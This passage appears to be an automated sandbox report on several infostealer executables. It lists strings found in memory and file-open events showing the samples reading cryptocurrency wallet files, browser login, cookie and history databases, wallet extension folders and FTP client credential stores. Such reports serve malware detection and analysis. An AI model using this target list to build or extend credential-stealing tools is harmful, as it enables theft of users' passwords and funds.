                                      Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                                      Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                                      Source: UD49QH6.exe, 00000010.00000003.1507260993.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitA
                                      Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                                      Source: UD49QH6.exe, 00000010.00000003.1467013696.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \jaxx\Local Storage\
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                                      Source: UD49QH6.exe, 00000010.00000003.1507260993.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkD
                                      Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file__0.localstorage
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default_wallet
                                      Source: UD49QH6.exe, 00000010.00000003.1466867227.0000000001393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
                                      Source: UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                                      Tries to harvest and steal browser information (history, passwords, etc)
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                      Tries to harvest and steal ftp login credentials
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                                      Tries to steal Crypto Currency Wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
